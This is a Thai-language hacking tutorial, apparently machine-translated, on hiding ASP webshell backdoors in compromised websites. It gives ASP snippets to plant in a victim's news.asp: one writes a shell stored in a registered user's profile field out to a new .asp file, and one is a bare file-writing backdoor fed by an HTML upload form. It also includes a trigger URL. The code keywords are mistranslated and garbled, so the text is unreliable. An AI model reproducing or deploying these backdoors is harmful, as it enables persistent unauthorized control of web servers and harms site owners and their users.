คำนำ: เป็นเวลานานแล้วตั้งแต่ผู้จัดการไซต์เริ่มแรกไปจนถึงแบ็คดอร์ ASP ยอดนิยมหลายตัวในตอนนี้ ฉันเชื่อว่าผู้ดูแลระบบเครือข่ายส่วนใหญ่สามารถตั้งชื่อเว็บเชลล์แบบคลาสสิกเหล่านี้ได้ เช่น Haiyang, Veteran, Blue Screen เป็นต้น ฉันยังเชื่อว่าส่วนใหญ่ ผู้ดูแลระบบเครือข่ายสามารถตั้งชื่อพวกเขาได้ ฉันเรียนรู้วิธีค้นหาคำสำคัญเพื่อค้นหาโทรจันเหล่านี้ แน่นอนว่าหากคุณต้องการซ่อนประตูหลังในเวลานี้คุณต้องใช้ทักษะบางอย่าง ดังคำกล่าวที่ว่า "พระพุทธเจ้าเป็นเท้าข้างเดียว ตัวสูงและฉันก็สูงหนึ่งฟุต”
ฉันไม่ปฏิเสธว่าการเขียน asp Trojan ลงในไฟล์รูปภาพดังที่กล่าวไว้ข้างต้นเป็นวิธีการที่ดี จริงๆ แล้ว มันสามารถเขียนได้ไม่เฉพาะในรูปภาพเท่านั้น แต่ยังเขียนลงในไฟล์ MP3 และในไฟล์ doc ได้ด้วย
วิธีการคัดลอกชื่อไฟล์/พารามิเตอร์ + ชื่อไฟล์/พารามิเตอร์เพื่อสร้างชื่อไฟล์
สามารถใช้งานได้อย่างยืดหยุ่นเพื่อให้บรรลุวัตถุประสงค์ในการซ่อนไฟล์ พารามิเตอร์เฉพาะคือ /a ในโหมดรหัส acsic /b ในโหมดไบนารี ดังนั้นฉันจะ' อย่าลงรายละเอียดมากเกินไป , ส่วนวิธีการอัพโหลด webshell นั้นคืออะไร webshell ไม่อยู่ในขอบเขตของบทความนี้ สิ่งที่เราจะพูดถึงในวันนี้คือวิธีใส่แบ็คดอร์ลงในฐานข้อมูลด้วยคำต่อท้าย .mdb หลักฐานก็คือหลังจากที่เราได้รับ webshell...
อย่างที่เราทราบกันดีว่าหลาย ๆ ไซต์ต้องกรอกข้อมูลหลายอย่างเมื่อใด การลงทะเบียนผู้ใช้ เช่น ชื่อผู้ใช้ รหัสผ่าน QQ อีเมล โปรไฟล์ส่วนตัว หมายเลขโทรศัพท์ ข้อมูลติดต่อ ที่อยู่ ฯลฯ นอกจากนี้ก็จะมีตาราง ฟิลด์ และค่าที่สอดคล้องกับฐานข้อมูลด้วย สิ่งที่ฉันต้องการทำในวันนี้คือการลงทะเบียนผู้ใช้และเขียนโค้ดเชลล์ในโปรไฟล์ส่วนตัวของฉัน จากนั้นแก้ไขไฟล์บนไซต์ของเขา เมื่อไฟล์นี้ถูกทริกเกอร์เมื่อใช้งาน ฉันจะใส่โค้ดเชลล์ในประวัติย่อส่วนตัวของฉัน จนถึงไดเร็กทอรีปัจจุบัน
เพื่อเป็นการไม่ให้เสียเวลา มาดูโค้ดกันดีกว่า:
-
ถ้า request("action")="firefox" แล้ว
fname=request.querystring("fn")
tname=request.querystring("tn")
bname=request.querystring("bn")
id=request.querystring("id")
idvalue=request.querystring("idv")
ตั้งค่า rs=server.createobject("ADODB.recordset")
sql="select "& bname & " จาก "&tname& " โดยที่ "&id&"="&idvalue&""""
rs.open sql,conn,1,3
ถ้าไม่ใช่ rs.eof แล้ว
เนื้อหา=rs(bname)
อื่น
การตอบกลับเขียนว่า "ไม่มีอะไร"
สิ้นสุดถ้า
ตั้งค่า fso=Server.createObject("Scripting.FileSystemObject")
ตั้งค่า txtfile=fso.createtextfile(server.mappath(fname))
txtfile.writeline (เนื้อหา)
txtfile.ปิด
สิ้นสุดถ้า
%>
เพิ่มโค้ดด้านบนลงในไฟล์บนเว็บไซต์ เช่น news.asp ตามข้อมูลที่เราทราบ หลังจากลงทะเบียนบนเว็บไซต์แล้ว ให้ดาวน์โหลดฐานข้อมูลเพื่อดูโครงสร้าง ชื่อ Firefox ที่ฉันลงทะเบียนอยู่ในตารางผู้ใช้ และค่า ID คือ 119 ช่องตารางที่ใช้จัดเก็บเรซูเม่ที่ลงทะเบียนของฉันคือ jl
news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119
จากนั้นเมื่อใช้งานเราสามารถเขียน webshell ชื่อ firefox.asp ลงในไดเร็กทอรีเดียวกันกับ news.asp ข้างต้นอาจกล่าวได้ว่าเป็นหนึ่งในวิธีการซ่อนนับพัน ต่อไป เรามาพูดถึงวิธีการซ่อนอื่นที่สะดวกกว่ากัน
ในทำนองเดียวกัน เรายังคงแก้ไข news.asp และแทรกโค้ดต่อไปนี้ลงใน news.asp ของอีกฝ่าย:
-
ถ้า request("action")="firefox" แล้ว
n=request.form("n")
c=request.form("ค")
ตั้งค่า fso=Server.createObject("Scripting.FileSystemObject")
ตั้งค่า txtfile=fso.createtextfile(server.mappath(n))
txtfile.writeline(ค)
txtfile.ปิด
สิ้นสุดถ้า
%>
รหัสนี้ค่อนข้างง่าย ถือได้ว่าเป็นฝั่งเซิร์ฟเวอร์ของม้าโทรจัน ใช้รหัสนี้เมื่อใช้งาน:
<HTML><HEAD>
<META http-equiv=เนื้อหาประเภทเนื้อหา="ข้อความ/html; charset=gb2312">
<title>พันธมิตรเทคโนโลยี Fst Firefox[www.wrsky.com]</title>
<การกระทำของรูปแบบ = " http://localhost/config.asp?action ... method=post>
<เนื้อหา META = "MSHTML 6.00.2900.2180" name=GENERATOR></HEAD>
<BODY>ชื่อ:<ขนาดอินพุต=50
ชื่อ=n width="32"><BR><BR>เชลล์:<ชื่อ TEXTAREA=c แถว=10 cols=80
width="32"></TEXTAREA><INPUT type=submit value=Save></FORM></BODY></HTML>
เปลี่ยนโค้ดด้านบน: "http://localhost/config.asp?action= แทนที่ "firefox" พร้อมที่อยู่เซิร์ฟเวอร์ของคุณและบันทึกเป็นไฟล์ .htm ในเครื่อง หลังจากเปิดในเครื่องแล้ว ให้กำหนดชื่อไฟล์ เนื้อหาไฟล์ และการส่งระยะไกลที่จะสร้าง ตกลง นี่เป็นอีกวิธีหนึ่งในการออกจากประตูหลัง